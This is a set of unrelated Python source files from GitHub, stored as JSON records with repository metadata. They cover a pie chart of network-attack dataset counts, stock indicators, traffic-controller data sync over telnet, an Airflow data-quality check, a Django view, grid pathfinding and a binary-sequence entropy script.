prefix\n\n :param prefix: Prefix indicating the record type\n :return: Unique record name\n \"\"\"\n return f\"{prefix} - {id(self)} - {int(time.time())}\"\n","repo_name":"davewalker5/NatureRecorderPy","sub_path":"tests/locust_tests/locustfile.py","file_name":"locustfile.py","file_ext":"py","file_size_in_byte":9628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"14828981111","text":"import matplotlib.pyplot as plt\n\nDDOS = 1926624\nDOS = 1650260\nRECON = 91082\nNORMAL = 477\nTHEFT = 79\nTOTAL = DDOS + DOS + RECON + NORMAL + THEFT\n\n# Pie chart, where the slices will be ordered and plotted counter-clockwise:\nlabels = [ 'DoS', 'Reconnaissance', 'Normal', 'DDos','Theft']\nsizes = [ DOS/TOTAL, RECON/TOTAL, NORMAL/TOTAL, DDOS/TOTAL,THEFT/TOTAL]\nexplode = (0, 0.0, 0, 0.1, 0.2)\n\nfig1, ax1 = plt.subplots()\nax1.pie(sizes, explode=explode, labels=labels, autopct='%1.1f%%',\n shadow=True, startangle=90)\nax1.axis('equal') # Equal aspect ratio ensures that pie is drawn as a circle.\n\nplt.show()\n\n\n","repo_name":"kaylani2/machineLearning","sub_path":"src/plot_functions/mockups_and_tests/pie.py","file_name":"pie.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"43"} +{"seq_id":"71405348610","text":"import pandas as pd\nimport numpy as np\n\n#data=pd.read_csv(\"data/RELIANCE.csv\")\n\nindicators_csv=pd.DataFrame(columns=['exchange','scrip','scrip_name','all_time_high','all_time_low','Fib 23.6','Fib 38.2'\n ,'Fib 61.8','Fib 78.6'])\ndim_scrips=pd.read_csv('dim_scrips.csv')\nichmoku_cloud=pd.DataFrame(columns=['exchange','scrip','scrip_name','open','high','low','close','volume','conversion_line','base_line','lead_span_A','lead_span_B','lagging_span'])\ni=0\ntotal_scrips=len(dim_scrips)\ntry:\n for i,row in dim_scrips.iterrows():\n scrip=row['Symbol']\n scrip_name=row['Company Name']\n #print(f\"Analysing scrip {scrip}\")\n data=pd.read_parquet(f\"data/{scrip}.parquet\")\n #data.index=pd.to_datetime(data['date'])\n date_index_without_tz=data.index.tz_convert(None)\n data.index=pd.to_datetime(date_index_without_tz)\n data['scrip']=scrip\n data['scrip_name']=scrip_name\n data['exchange']=\"NSE\" \n scrip_max=data['high'].max()\n scrip_min=data['high'].min()\n diff=scrip_max-scrip_min\n fb_23_6=scrip_max-(diff*0.236)\n fb_38_2=scrip_max-(diff*0.382)\n fb_61_8=scrip_max-(diff*0.618)\n fb_78_6=scrip_max-(diff*0.786)\n \n # Define length of Tenkan Sen or Conversion Line\n cl_period = 20 \n \n # Define length of Kijun Sen or Base Line\n bl_period = 60 \n \n # Define length of Senkou Sen B or Leading Span B\n lead_span_b_period = 120 \n \n # Define length of Chikou Span or Lagging Span\n lag_span_period = 30 \n \n # Calculate conversion line\n high_20 = data['high'].rolling(cl_period).max()\n low_20 = data['low'].rolling(cl_period).min()\n data['conversion_line'] = (high_20 + low_20) / 2\n \n # Calculate based line\n high_60 = data['high'].rolling(bl_period).max()\n low_60 = data['low'].rolling(bl_period).min()\n data['base_line'] = (high_60 + low_60) / 2\n \n # Calculate leading span A\n data['lead_span_A'] = ((data.conversion_line + data.base_line) / 2).shift(lag_span_period)\n \n # Calculate leading span B\n high_120 = data['high'].rolling(120).max()\n low_120 = data['high'].rolling(120).min()\n data['lead_span_B'] = ((high_120 + low_120) / 2).shift(lead_span_b_period)\n \n # Calculate lagging span\n data['lagging_span'] = data['close'].shift(-lag_span_period)\n\n indicators_csv.loc[i]=\"NSE\",scrip,scrip_name,scrip_max,scrip_min,fb_23_6,fb_38_2,fb_61_8,fb_78_6\n #data.to_csv(\"ichmoku_cloud.csv\")\n ichmoku_cloud=pd.concat([ichmoku_cloud,data])\n print(f\"Analysis Completed {round((i+1)/total_scrips*100,2)} % \",end=\"\\r\")\n i=i+1\n \nexcept Exception as e:\n print(e)\n\nindicators_csv.to_excel(\"indicators.xlsx\",index=False)\nprint(\"\\nGenerated fibonacci\")\nichmoku_cloud.to_csv(\"ichmoku_cloud.csv\")\nprint(\"Generated ichmoku\")","repo_name":"webclinic017/turing_trade","sub_path":"generate_indicators.py","file_name":"generate_indicators.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"16300281904","text":"import re\r\nimport pyte\r\nimport copy\r\nimport datetime\r\nimport pandas as pd\r\nimport dacot_models as dm\r\nfrom .config import get_settings\r\nfrom .telnet_command_executor import TelnetCommandExecutor as TCE\r\nfrom .graphql_mutations import DEFAULT_VEHICLE_INTERGREEN_VALUE\r\nfrom .complex_operations import ComputeJunctionPlansTables\r\n\r\nclass SyncProjectFromControlException(Exception):\r\n pass\r\n\r\nclass SyncProject:\r\n def __init__(self, project):\r\n self.__proj = project\r\n self.__exec = TCE(host=get_settings().utc_host, port=get_settings().utc_port)\r\n self.__read_remote_sleep = 3\r\n self.__read_remote_login_sleep = 12\r\n self.__re_ansi_escape = re.compile(r'\\x1B(?:[@-Z\\\\-_]|[0-9]|\\[[0-?]*[ -/]*[@-~])|\\r|\\n')\r\n self.__re_program = re.compile(r'(?P(\\d{2}:\\d{2}:\\d{2})?)(\\d{3})?\\s+PLAN\\s+(?P[J|A]\\d{6})\\s+(?P(\\d+|[A-Z]{1,2}))\\s+TIMETABLE$')\r\n self.__re_scoot = re.compile(r'^(\\d+)\\s*(XSCO|SCOO).*$')\r\n self.__re_demand = re.compile(r'^(\\d+)\\s*(XDEM|DEMA).*$')\r\n self.__re_program_hour = re.compile(r'(?P\\d{2}:\\d{2}:\\d{2}).*$')\r\n self.__re_plan = re.compile(r'^Plan\\s+(?P\\d+)\\s(?PJ\\d{6}).*(?PCY\\d{3})\\s(?P[A-Z0-9\\s,!*]+)$')\r\n self.__re_intergreens_table = re.compile(r'\\s(?P[A-Z])\\s+(?P[NY])\\s+(?P\\d+)\\s+(?P\\d+)\\s+(?P((X|\\d+)\\s+)+(X|\\d+))')\r\n self.__re_extract_phases = re.compile(r'\\s[A-Z]\\s\\d+')\r\n self.__re_extract_sequence = re.compile(r'Cyclic Check Sequence\\s+:\\s\\[(?P[A-Z]+)')\r\n self.__re_ctrl_type = re.compile(r'Controller Type\\s+:\\s\\[(?P.*)]')\r\n self.__table_id_to_day = {\r\n '1': 'LU',\r\n '2': 'SA',\r\n '3': 'DO'\r\n }\r\n\r\n def __step1(self):\r\n out1 = copy.deepcopy(self.__session1())\r\n assert list(out1[0].keys()) == list(out1[1].keys())\r\n progs = self.__build_programs(out1[0])\r\n plans = self.__build_plans(out1[0])\r\n return plans, progs\r\n\r\n def __step2(self):\r\n out2 = copy.deepcopy(self.__session2())\r\n assert list(out2[0].keys()) == list(out2[1].keys())\r\n return self.__build_sequence(out2[1])\r\n\r\n def __step3(self):\r\n out3 = copy.deepcopy(self.__session3())\r\n assert list(out3[0].keys()) == list(out3[1].keys())\r\n return self.__build_inters(out3[1])\r\n\r\n def run(self):\r\n inters = self.__step3()\r\n seq = self.__step2()\r\n plans, progs = self.__step1()\r\n self.__update_project(plans, progs, inters, seq)\r\n return self.__proj\r\n\r\n def __build_sequence(self, data):\r\n r = {}\r\n screen = pyte.Screen(80, 25)\r\n stream = pyte.Stream(screen)\r\n for junc in self.__proj.otu.junctions:\r\n k = 'get-seed-{}'.format(junc.jid)\r\n for line in self.__posibles_lists_to_list(data[k]):\r\n stream.feed(line)\r\n result_screen = '\\n'.join(screen.display)\r\n seq_info = self.__extract_sequence(junc, result_screen)\r\n known_types = {}\r\n seq_objs = []\r\n for s in junc.sequence:\r\n known_types[s.phid_system] = s.type\r\n for sid in seq_info['seq']:\r\n t = 'No Configurada'\r\n if sid in known_types:\r\n t = known_types[sid]\r\n seq_objs.append(dm.JunctionPhaseSequenceItem(phid_system=sid, phid=str(ord(sid) - 64), type=t))\r\n r[junc.jid] = {\r\n 'seq': seq_objs,\r\n 'ctype': seq_info['ctype']\r\n }\r\n return r\r\n\r\n def __extract_sequence(self, junc, screen):\r\n r = {}\r\n print('DEBUG __extract_sequence')\r\n print('=' * 35)\r\n print(screen)\r\n print('=' * 35)\r\n sequence_match = list(self.__re_extract_sequence.finditer(screen, re.MULTILINE))\r\n if len(sequence_match) != 1:\r\n raise ValueError('__extract_sequence: Failed to find Sequence for {}'.format(junc.jid))\r\n seqstr = sequence_match[0].group('sequence').strip()\r\n seq = []\r\n for pid in seqstr:\r\n seq.append(pid)\r\n r['seq'] = seq\r\n ctrl_match = list(self.__re_ctrl_type.finditer(screen, re.MULTILINE))\r\n if len(ctrl_match) != 1:\r\n raise ValueError('__extract_sequence: Failed to find ControllerType for {}'.format(junc.jid))\r\n r['ctype'] = ctrl_match[0].group('ctrl_type').strip()\r\n return r\r\n\r\n def __build_inters(self, data):\r\n r = {}\r\n screen = pyte.Screen(80, 25)\r\n stream = pyte.Stream(screen)\r\n for junc in self.__proj.otu.junctions:\r\n k = 'get-seed-timings-{}'.format(junc.jid)\r\n for line in self.__posibles_lists_to_list(data[k]):\r\n stream.feed(line)\r\n result_screen = '\\n'.join(screen.display)\r\n inters = self.__extract_intergreens(junc, result_screen)\r\n r[junc.jid] = inters\r\n return r\r\n\r\n def __extract_intergreens(self, junc, screen):\r\n print('DEBUG __extract_intergreens')\r\n print('=' * 35)\r\n print(screen)\r\n print('=' * 35)\r\n rows_match = list(self.__re_intergreens_table.finditer(screen, re.MULTILINE))\r\n if len(rows_match) == 0:\r\n raise ValueError('__extract_intergreens: Failed to extract intergreens for {}'.format(junc.jid))\r\n table = []\r\n names = []\r\n for row in rows_match:\r\n inter_values = row.group('intergreens')\r\n names.append(row.group('phase_name'))\r\n trow = [row.group('phase_name'), row.group('is_demand'), row.group('min_time'), row.group('max_time')]\r\n trow.extend(inter_values.split())\r\n table.append(trow)\r\n column_names = ['Phase', 'IsDemand', 'MinTime', 'MaxTime']\r\n column_names.extend(names)\r\n for row in table:\r\n if len(row) != len(column_names):\r\n raise ValueError('__extract_intergreens: Invalid row length: row={} columns={}'.format(row, len(column_names)))\r\n df = pd.DataFrame(table, columns=column_names)\r\n df = df.set_index('Phase')\r\n cols = df.columns[3:]\r\n inters = []\r\n for i in cols:\r\n for j in cols:\r\n if i != j and 'X' not in df[i][j]:\r\n newi = dm.JunctionIntergreenValue(phfrom=j, phto=i, value=df[i][j])\r\n newi.validate()\r\n inters.append(newi)\r\n return inters\r\n\r\n def __update_project(self, plans, progs, inters, seq):\r\n new_progs = []\r\n for p in progs:\r\n i = dm.OTUProgramItem(day=p[0], time=p[1], plan=p[2])\r\n i.validate()\r\n new_progs.append(i)\r\n self.__proj.otu.programs = new_progs\r\n for junc in self.__proj.otu.junctions:\r\n junc.intergreens = inters[junc.jid]\r\n junc.sequence = seq[junc.jid]['seq']\r\n if junc.metadata.use_default_vi4:\r\n junc.plans = self.__generate_plans_objs(plans[junc.jid])\r\n veh_inters = []\r\n for inter in junc.intergreens:\r\n new_inter = dm.JunctionIntergreenValue()\r\n new_inter.phfrom = inter.phfrom\r\n new_inter.phto = inter.phto\r\n new_inter.value = str(DEFAULT_VEHICLE_INTERGREEN_VALUE)\r\n veh_inters.append(new_inter)\r\n junc.veh_intergreens = veh_inters\r\n else:\r\n junc.plans = self.__generate_plans_objs(plans[junc.jid])\r\n veh_inters = []\r\n inters_map = {}\r\n for inter in junc.veh_intergreens:\r\n if inter.phfrom not in inters_map:\r\n inters_map[inter.phfrom] = {}\r\n inters_map[inter.phfrom][inter.phto] = str(inter.value)\r\n for inter in junc.intergreens:\r\n new_inter = dm.JunctionIntergreenValue()\r\n new_inter.phfrom = inter.phfrom\r\n new_inter.phto = inter.phto\r\n val = inters_map.get(inter.phfrom, {}).get(inter.phto)\r\n if not val:\r\n raise ValueError('Missing VI for pair ({}, {})'.format(inter.phfrom, inter.phto))\r\n new_inter.value = val\r\n veh_inters.append(new_inter)\r\n junc.veh_intergreens = veh_inters\r\n compute = ComputeJunctionPlansTables(self.__proj)\r\n self.__proj.metadata.last_sync_date = datetime.datetime.utcnow()\r\n self.__proj.metadata.status_date = self.__proj.metadata.last_sync_date\r\n self.__proj = compute.run()\r\n\r\n def __generate_plans_objs(self, plans):\r\n res = []\r\n for p in plans:\r\n start = []\r\n for s in p[2]:\r\n val = dm.JunctionPlanPhaseValue(phid=s[0], value=s[1])\r\n val.validate()\r\n start.append(val)\r\n newp = dm.JunctionPlan(plid=p[0], cycle=p[1], system_start=start)\r\n newp.validate()\r\n res.append(newp)\r\n return res\r\n\r\n def __build_plans(self, out):\r\n res = {}\r\n for junc in self.__proj.otu.junctions:\r\n k = 'get-plans-{}'.format(junc.jid)\r\n res[junc.jid] = []\r\n for line in out[k]:\r\n match = self.__re_plan.match(line)\r\n if match:\r\n plan_id = match.group('id')\r\n cycle = match.group('cycle')\r\n cycle_int = int(cycle.split('CY')[1])\r\n phases = []\r\n for x in self.__re_extract_phases.findall(' {}'.format(match.group('phases'))):\r\n name, start = x.strip().split()\r\n phases.append((str(ord(name) - 64), str(int(start))))\r\n res[junc.jid].append((plan_id, cycle_int, phases))\r\n return res\r\n\r\n def __build_programs(self, out):\r\n kl = [k for k in out if 'get-programs-' in k]\r\n res = {}\r\n for k in kl:\r\n tid = k[-1]\r\n current_time = ''\r\n for line in out[k]:\r\n new_hour = self.__check_new_hour(line)\r\n prog_match = self.__re_program.match(line)\r\n is_extra_day = self.__check_is_day(line)\r\n is_scoot_change = self.__check_is_scoot(line)\r\n is_demand_change = self.__check_is_demand(line)\r\n if new_hour[0]:\r\n current_time = new_hour[1]\r\n if prog_match:\r\n res[(self.__table_id_to_day[tid], current_time, prog_match.group('plan'))] = prog_match.group('plan')\r\n elif is_extra_day[0]:\r\n line_without_day = is_extra_day[1]\r\n line_day = is_extra_day[2]\r\n extra_plan_match = self.__re_program.match(line_without_day)\r\n extra_scoot_match = self.__check_is_scoot(line_without_day)\r\n extra_demand_match = self.__check_is_demand(line_without_day)\r\n if extra_plan_match:\r\n res[(line_day, current_time, extra_plan_match.group('plan'))] = extra_plan_match.group('plan')\r\n elif extra_scoot_match[0]:\r\n res[(line_day, current_time, extra_scoot_match[1])] = extra_scoot_match[1]\r\n elif extra_demand_match[0]:\r\n res[(line_day, current_time, extra_demand_match[1])] = extra_demand_match[1]\r\n elif is_scoot_change[0]:\r\n res[(self.__table_id_to_day[tid], current_time, is_scoot_change[1])] = is_scoot_change[1]\r\n elif is_demand_change[0]:\r\n res[(self.__table_id_to_day[tid], current_time, is_demand_change[1])] = is_demand_change[1]\r\n else:\r\n pass\r\n final_progs = []\r\n for k, v in res.items():\r\n item = (k[0], k[1], v)\r\n new_item = (k[0], k[1], k[2], v)\r\n print('Item: {} -> NewItem: {}'.format(item, new_item))\r\n final_progs.append(item)\r\n sorted = self.__sort_programs(final_progs)\r\n print('Result of __sort_programs: {}'.format(sorted))\r\n final_result = self.__map_by_time_and_clear(sorted)\r\n print('Final result of __map_by_time_and_clear: {}'.format(final_result))\r\n return final_result\r\n\r\n def __map_by_time_and_clear(self, sorted):\r\n m = {}\r\n r = []\r\n for i in sorted:\r\n k = (i[0], i[1])\r\n if k not in m:\r\n m[k] = []\r\n m[k].append(i[2])\r\n for k, v in m.items():\r\n if len(v) > 1:\r\n if 'XSCO' in v or 'SCOO' in v or 'XDEM' in v or 'DEMA' in v:\r\n for x in v:\r\n r.append((k[0], k[1], x))\r\n else:\r\n r.append((k[0], k[1], v[-1])) \r\n else:\r\n r.append((k[0], k[1], v[0]))\r\n return r\r\n\r\n def __sort_programs(self, progs):\r\n dmap = {\r\n 'LU': 0,\r\n 'MA': 1,\r\n 'MI': 2,\r\n 'JU': 3,\r\n 'VI': 4,\r\n 'SA': 5,\r\n 'DO': 6\r\n }\r\n rdmap = {\r\n 0: 'LU',\r\n 1: 'MA',\r\n 2: 'MI',\r\n 3: 'JU',\r\n 4: 'VI',\r\n 5: 'SA',\r\n 6: 'DO'\r\n }\r\n to_sort = []\r\n for p in progs:\r\n a = dmap[p[0]]\r\n b = self.__time_to_mins(p[1])\r\n to_sort.append((a, b, p[1], p[2]))\r\n sorted_plans = sorted(to_sort, key=lambda x: (x[0], x[1]))\r\n res = []\r\n for i in sorted_plans:\r\n res.append((rdmap[i[0]], i[2], i[3]))\r\n return res\r\n\r\n def __time_to_mins(self, timestr):\r\n h, m = timestr.split(':')\r\n return int(h) * 60 + int(m)\r\n\r\n def __check_new_hour(self, line):\r\n match = self.__re_program_hour.match(line)\r\n if match:\r\n return (True, match.group('hour')[:-3])\r\n return (False, None)\r\n\r\n def __check_is_demand(self, line):\r\n if self.__re_demand.match(line):\r\n if 'XDEM' in line:\r\n return (True, 'XDEM')\r\n elif 'DEMA' in line:\r\n return (True, 'DEMA')\r\n else:\r\n return (False, None)\r\n else:\r\n return (False, None)\r\n\r\n def __check_is_scoot(self, line):\r\n if self.__re_scoot.match(line):\r\n if 'XSCO' in line:\r\n return (True, 'XSCO')\r\n elif 'SCOO' in line:\r\n return (True, 'SCOO')\r\n else:\r\n return (False, None)\r\n else:\r\n return (False, None)\r\n\r\n def __check_is_day(self, line):\r\n to_spanish = {\r\n 'MONDAY ': 'LU',\r\n 'TUESDAY ': 'MA',\r\n 'WEDNESDAY ': 'MI',\r\n 'THURSDAY ': 'JU',\r\n 'FRIDAY ': 'VI',\r\n 'SATURDAY ': 'SA',\r\n 'SUNDAY ': 'DO'\r\n }\r\n days = ['MONDAY ', 'TUESDAY ', 'WEDNESDAY ', 'THURSDAY ', 'FRIDAY ', 'SATURDAY ', 'SUNDAY ']\r\n for d in days:\r\n if d in line:\r\n return (True, line.replace(d, ''), to_spanish[d])\r\n return (False, None, None)\r\n\r\n def __session1(self):\r\n self.__exec.reset()\r\n self.__control_login()\r\n for junc in self.__proj.otu.junctions:\r\n self.__list_plans(junc.jid)\r\n self.__get_programs(junc.jid)\r\n self.__logout()\r\n print('Using plan for {} (__session1): {}'.format(self.__proj.oid, self.__exec.history()))\r\n self.__exec.run(debug=True)\r\n out = self.__exec.get_results()\r\n self.__run_login_check(out)\r\n return (self.__output_to_text_block(out), out)\r\n\r\n def __session2(self):\r\n self.__exec.reset()\r\n self.__control_login()\r\n for junc in self.__proj.otu.junctions:\r\n self.__get_sequence(junc.jid)\r\n self.__logout()\r\n print('Using plan for {} (__session2): {}'.format(self.__proj.oid, self.__exec.history()))\r\n self.__exec.run(debug=True)\r\n out = self.__exec.get_results()\r\n self.__run_login_check(out)\r\n return (self.__output_to_text_block(out), out)\r\n\r\n def __session3(self):\r\n self.__exec.reset()\r\n self.__control_login()\r\n for junc in self.__proj.otu.junctions:\r\n self.__get_inters(junc.jid)\r\n self.__logout()\r\n print('Using plan for {} (__session3): {}'.format(self.__proj.oid, self.__exec.history()))\r\n self.__exec.run(debug=True)\r\n out = self.__exec.get_results()\r\n self.__run_login_check(out)\r\n return (self.__output_to_text_block(out), out)\r\n\r\n def __list_plans(self, jid):\r\n self.__exec.command('get-plans-{}'.format(jid), 'LIPT {} TIMINGS'.format(jid))\r\n self.__exec.sleep(self.__read_remote_sleep)\r\n self.__exec.read_lines(encoding='iso-8859-1', line_ending=b'\\x1b8\\x1b7')\r\n\r\n def __get_programs(self, jid):\r\n for day_table_code in range(1, 4):\r\n self.__exec.command('get-programs-{}-{}'.format(jid, day_table_code), 'OUTT {} {} EXPAND'.format(jid, day_table_code))\r\n self.__exec.sleep(self.__read_remote_sleep)\r\n self.__exec.read_lines(encoding='iso-8859-1', line_ending=b'\\x1b8\\x1b7')\r\n\r\n def __get_sequence(self, jid):\r\n self.__exec.command('get-seed-{}'.format(jid), 'SEED {}'.format(jid))\r\n self.__exec.sleep(self.__read_remote_sleep)\r\n self.__exec.read_until_min_bytes(2000, encoding=\"iso-8859-1\", line_ending=b\"\\x1b8\\x1b7\")\r\n self.__exec.exit_interactive_command()\r\n\r\n def __get_inters(self, jid):\r\n self.__exec.command('get-seed-timings-{}'.format(jid), 'SEED {} UPPER_TIMINGS'.format(jid))\r\n self.__exec.sleep(self.__read_remote_sleep)\r\n self.__exec.read_until_min_bytes(2000, encoding=\"iso-8859-1\", line_ending=b\"\\x1b8\\x1b7\")\r\n self.__exec.exit_interactive_command()\r\n\r\n def __run_login_check(self, out):\r\n if 'Access Denied' in self.__lines_to_string(out['login-pass']):\r\n raise SyncProjectFromControlException('Invalid Credentials for Control Server')\r\n if 'Successfully logged in!' not in self.__lines_to_string(out['login-pass']):\r\n raise SyncProjectFromControlException('Unknown error in login for Control Server')\r\n\r\n def __logout(self):\r\n self.__exec.command('end-session', 'ENDS')\r\n\r\n def __lines_to_string(self, l):\r\n return ''.join(self.__flatten(l))\r\n\r\n def __flatten(self, l):\r\n return [i for s in l for i in s]\r\n\r\n def __control_login(self):\r\n self.__exec.read_until('Username:', self.__read_remote_login_sleep)\r\n self.__exec.command('login-user', get_settings().utc_user)\r\n self.__exec.read_until('Password:', self.__read_remote_login_sleep)\r\n self.__exec.command('login-pass', get_settings().utc_passwd)\r\n self.__exec.read_lines(encoding='iso-8859-1')\r\n\r\n def __output_to_text_block(self, data):\r\n r = {}\r\n for k, v in data.items():\r\n t = []\r\n for i in self.__posibles_lists_to_list(v):\r\n clean_line = self.__re_ansi_escape.sub('', i).strip()\r\n t.append(clean_line)\r\n r[k] = t\r\n return r\r\n\r\n def __posibles_lists_to_list(self, v):\r\n t = []\r\n for possible_list in v:\r\n if type(possible_list) == list:\r\n for line in possible_list:\r\n t.append(line)\r\n else:\r\n t.append(possible_list)\r\n return t\r\n","repo_name":"DACoT-UOCT/backend","sub_path":"fastapi_backend/app/control_operations.py","file_name":"control_operations.py","file_ext":"py","file_size_in_byte":19768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"507722385","text":"from airflow.hooks.postgres_hook import PostgresHook\nfrom airflow.models import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\n\nclass DataQualityOperator(BaseOperator):\n\n ui_color = '#89DA59'\n\n @apply_defaults\n def __init__(self,\n redshift_conn_id=\"\",\n sql_stmt=\"\",\n result=\"\",\n *args, **kwargs):\n\n super(DataQualityOperator, self).__init__(*args, **kwargs)\n self.redshift_conn_id = redshift_conn_id\n self.sql_stmt = sql_stmt\n self.result = result\n\n def execute(self, context):\n redshift_hook = PostgresHook(self.redshift_conn_id)\n \n # CHECK THAT THE TABLE IS POPULATED WITH RECORDS RETURNED\n for expected, actual in zip(self.result, self.sql_stmt):\n actual_rendered = redshift_hook.get_records(actual)\n if expected != actual_rendered[0][0]:\n raise ValueError(f\"Data quality check failed. Expected {expected}, but returned result {actual_rendered[0][0]}\")\n self.log.info(f\"Data quality check passed. Returned result {actual_rendered[0][0]} agrees with expected result {expected}\")\n","repo_name":"davidjcampbell89/udacity-data-engineer-nanodegree","sub_path":"Project6-Data-Pipelines/airflow/plugins/operators/data_quality.py","file_name":"data_quality.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"15634003874","text":"import sqlite3 as sl\nfrom datetime import datetime as dt\n\nconn = sl.connect(\"test.db\",check_same_thread=False)\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\n\n# Create your views here.\n\ndef index(request):\n header = str(request.headers.keys())\n header = header[10:len(header)-2].split(',')\n for words in header:\n if words.find(\"Data\") != -1:\n id = int(words.split(\":\")[1].split(\"'\")[1])\n current = dt.now()\n print(current)\n conn.execute(f\"UPDATE KSEB set YEAR = {current.year} where ID = {id}\")\n conn.execute(f\"UPDATE KSEB set MONTH = {current.month} where ID = {id}\")\n conn.execute(f\"UPDATE KSEB set DAY = {current.day} where ID = {id}\")\n conn.execute(f\"UPDATE KSEB set HOUR = {current.hour} where ID = {id}\")\n conn.execute(f\"UPDATE KSEB set MINUTE = {current.minute} where ID = {id}\")\n conn.commit()\n\n return HttpResponse(\"Hello, world. You're at the polls index.\")\n\n","repo_name":"abuFahad007/silver-engine","sub_path":"mysite/polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"24106632395","text":"import pygame, png, math, sys\nfrom random import randint\n\n#from src.python_src.constants import *\n#from src.python_src.classes import *\n\nclass Pathfinding():\n\n def __init__(self, mymap):\n self.found = False\n self.blocked = False\n self.size_x = len(mymap[0])\n self.size_y = len(mymap)\n self.around = 2\n self.distance = 0\n self.origin = self.around\n self.mymap = mymap\n self.mymap_original = [row[:] for row in self.mymap]\n self.start = (0,0)\n self.end = (0,0)\n\n def get_map_size_x(self):\n return self.size_x\n\n def get_map_size_y(self):\n return self.size_y\n\n def get_map_path(self):\n self.track()\n return self.mymap\n \n def track(self):\n x = self.end[0]\n y = self.end[1]\n if self.found:\n while self.around > self.origin:\n if y-1 >= 0 and self.mymap[y-1][x] == self.around:\n self.mymap[y-1][x] = 1\n self.around -= 1\n y -= 1\n if y+1 < self.size_y and self.mymap[y+1][x] == self.around:\n self.mymap[y+1][x] = 1\n self.around -= 1\n y += 1\n if x-1 >= 0 and self.mymap[y][x-1] == self.around:\n self.mymap[y][x-1] = 1\n self.around -= 1\n x -= 1\n if x+1 < self.size_x and self.mymap[y][x+1] == self.around:\n self.mymap[y][x+1] = 1\n self.around -= 1\n x += 1\n\n def set_robot_pos(self, pos):\n self.end = pos\n self.reset_mymap()\n \n def set_enemy_pos(self, pos):\n self.start = pos\n self.reset_mymap()\n \n def reset_mymap(self):\n self.mymap = [row[:] for row in self.mymap_original]\n self.mymap[self.start[1]][self.start[0]] = self.origin\n self.mymap[self.end[1]][self.end[0]] = self.origin-1\n \n def findpath(self):\n self.found = False\n self.blocked = False\n self.distance = 0\n self.around = self.origin\n while not self.found and not self.blocked:\n self.blocked = True\n for y in range(self.size_y):\n for x in range(self.size_x):\n if self.mymap[y][x] == self.around:\n self.stepup(x, y, self.around)\n self.stepdown(x, y, self.around)\n self.stepleft(x, y, self.around)\n self.stepright(x, y, self.around)\n self.around += 1\n self.around -= 1\n self.distance = self.around -1\n \n def get_distance(self):\n self.findpath()\n return self.distance\n \n def stepup(self, x, y, around):\n if y-1 >= 0:\n if self.mymap[y-1][x] == 0:\n if self.mymap[y+1][x] == -1 or self.mymap[y+2][x] == -1:\n self.mymap[y-1][x] = around + 1\n self.blocked = False\n if self.mymap[y-1][x] == 1:\n self.found = True\n \n def stepdown(self, x, y, around):\n if y+1 < self.size_y and self.mymap[y+1][x] == 0:\n self.mymap[y+1][x] = around + 1\n self.blocked = False\n if y+1 < self.size_y and self.mymap[y+1][x] == 1:\n self.found = True \n\n def stepleft(self, x, y, around):\n if x-1 >= 0 and self.mymap[y][x-1] == 0:\n self.mymap[y][x-1] = around + 1\n self.blocked = False\n if x-1 >= 0 and self.mymap[y][x-1] == 1:\n self.found = True \n\n def stepright(self, x, y, around):\n if x+1 < self.size_x and self.mymap[y][x+1] == 0:\n self.mymap[y][x+1] = around + 1\n self.blocked = False\n if x+1 < self.size_x and self.mymap[y][x+1] == 1:\n self.found = True \n\n def print_mymap(self):\n for y in range(self.size_y):\n print (self.mymap[y])\n print (\"\")\n","repo_name":"gifteam/Project-Super-Retro-World","sub_path":"Super_Retro_World_v1/build/exe.win32-3.6/src/python_src/classes/Pathfinding.py","file_name":"Pathfinding.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"5648524932","text":"import random\nfrom math import log2\n\nsequence = []\ncharCount = 0\nbinCount = [0,0]\n#array2 = [0,1]\n#array3 = [00,01,10,11]\n#array4 = [000,001,010,011,100,101,110,111]\n#array5 = [0000,0100,1000,1100,0001,0101,1001,1101,0010,0110,1010,1110,0011,0111,1011,1111]\nprobabilities = [0,0]\n\nlist1 = ['{:01b}'.format(i) for i in range(2)]\nlist2 = ['{:02b}'.format(i) for i in range(4)]\nlist3 = ['{:03b}'.format(i) for i in range(8)]\nlist4 = ['{:04b}'.format(i) for i in range(16)]\nlist5 = ['{:05b}'.format(i) for i in range(32)]\nlist6 = ['{:06b}'.format(i) for i in range(64)]\nlist7 = ['{:07b}'.format(i) for i in range(128)]\nlist8 = ['{:08b}'.format(i) for i in range(256)]\nlist9 = ['{:09b}'.format(i) for i in range(516)]\n\ndict1 = dict.fromkeys(list1, 0)\ndict2 = dict.fromkeys(list2, 0)\ndict3 = dict.fromkeys(list3, 0)\ndict4 = dict.fromkeys(list4, 0)\ndict5 = dict.fromkeys(list5, 0)\ndict6 = dict.fromkeys(list6, 0)\ndict7 = dict.fromkeys(list7, 0)\ndict8 = dict.fromkeys(list8, 0)\ndict9 = dict.fromkeys(list9, 0)\n\nfor _ in range(100):\n k = random.randint(0, 1) # decide on a k each time the loop runs\n #print(k)\n sequence.append(k)\n charCount += 1\n if k == 0:\n dict1['0'] += 1\n elif k == 1:\n dict1['1'] += 1\n\ndef getEntropy(probabilities):\n entropy = 0\n for n in range(len(probabilities)):\n #print(probabilities[n])\n entropy += (probabilities[n] * log2(probabilities[n]))\n entropy = -entropy\n return entropy\n \nprint(\"The sequence is: \",sequence)\n#print(dict1)\nprobabilities[0] = dict1['0']/charCount\nprobabilities[1] = dict1['1']/charCount\n#print(probabilities)\nentropy = getEntropy(probabilities)\nprint(\"The entropy of H(M,N=1) is\", entropy)\n\n\n#https://stackoverflow.com/questions/15450192/fastest-way-to-compute-entropy-in-python\n\n","repo_name":"IleanaAurora/Python","sub_path":"Cryptography/Canceled Class 